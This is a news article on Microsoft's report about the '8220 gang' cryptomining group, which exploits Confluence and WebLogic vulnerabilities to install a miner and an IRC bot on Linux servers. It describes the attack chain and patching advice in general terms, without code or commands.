Microsoft says it has spotted “notable updates” to malware targeting Linux servers to install cryptominer malware.
Microsoft has called out recent work from the so-called “8220 gang” group, which has recently been spotted exploiting the critical bug affecting Atlassian Confluence Server and Data Center, tracked as CVE-2022-26134.
“The group has actively updated its techniques and payloads over the last year. The most recent campaign targets i686 and x86_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) for initial access,” Microsoft’s Security Intelligence Centre notes.
SEE: Cloud computing dominates. But security is now the biggest challenge
“The updates include the deployment of new versions of a cryptominer and an IRC bot, as well the use of an exploit for a recently disclosed vulnerability,” Microsoft warned.
Atlassian disclosed the bug on June 2 and within a week, security firm Check Point discovered the 8220 gang was using the Atlassian flaw to install malware on Linux systems. The group was also targeting Windows systems using the Atlassian flaw to inject a script into a PowerShell memory process.
CISA had already warned federal agencies to patch it by June 6 and until then block all internet access to the product.
The 8220 gang has been active since 2017, according to Cisco’s Talos Intelligence group, which described it as a Chinese-speaking, Monero-mining threat actor whose C2’s often communicate over port 8220, thus earning its name. At that stage they were targeting Apache Struts2 and Docker image vulnerabilities to compromise enterprise servers.
According to Microsoft, after the 8220 gang gains initial access via CVE-2022-26134, it downloads a loader to the system that changes its configurations to disable security services, downloads a cryptominer, establishes persistence on a network, and then scans ports on the network to find other servers.
SEE: Why should we care about cryptocurrency? The business case for taking a closer look
Microsoft warns admins to enable Defender for Endpoint tamper protection settings because the loader clears log files and disables cloud-monitoring and security tools.
The loader downloads the pwnRig cryptominer (v1.41.9) and an IRC bot run commands from a C2 server. It survives a reboot by creating scheduling tasks via a cronjob or a script that runs every 60 seconds as a nohup or “no hangup” command.
“The loader uses the IP port scanner tool “masscan” to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool “spirit” to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts,” Microsoft explains.